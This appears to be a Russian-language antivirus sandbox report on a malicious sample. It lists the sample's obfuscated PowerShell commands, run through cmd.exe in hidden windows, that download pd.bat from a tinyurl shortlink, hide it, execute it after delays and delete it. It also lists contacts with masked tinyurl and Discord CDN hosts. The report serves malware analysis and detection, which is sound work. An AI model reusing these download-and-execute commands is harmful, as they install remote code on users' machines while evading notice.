Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c p^ow^ershell -w 1 Start-Sleep 40; Remove-Item -Path $enV`:TEM`P\pd.bat -Force
- '<SYSTEM32>\cmd.exe' /c p^ow^ershell -w 1 cd $enV`:TEM`P;Start-Sleep 17;(get-item pd.bat).Attributes= 'Hidden'
- '<SYSTEM32>\cmd.exe' /c p^ow^ershell -w 1 Start-Sleep 25;cd $enV`:TEM`P; .\pd.bat
- '<SYSTEM32>\cmd.exe' /c p^owershell -w 1 (nEw-oBjecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y2sweuzc','pd.bat')
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\documents\pd.bat
Сетевая активность
TCP
- 'ti##url.com':443
- 'cd#.##scordapp.com':443
UDP
- DNS ASK ti##url.com
- DNS ASK cd#.##scordapp.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c p^ow^ershell -w 1 Start-Sleep 40; Remove-Item -Path $enV`:TEM`P\pd.bat -Force' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c p^ow^ershell -w 1 cd $enV`:TEM`P;Start-Sleep 17;(get-item pd.bat).Attributes= 'Hidden'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c p^ow^ershell -w 1 Start-Sleep 25;cd $enV`:TEM`P; .\pd.bat' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c p^owershell -w 1 (nEw-oBjecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y2sweuzc','pd.bat')' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Start-Sleep 40; Remove-Item -Path $enV`:TEM`P\pd.bat -Force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Start-Sleep 25;cd $enV`:TEM`P; .\pd.bat
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 cd $enV`:TEM`P;Start-Sleep 17;(get-item pd.bat).Attributes= 'Hidden'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oBjecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y2sweuzc','pd.bat')
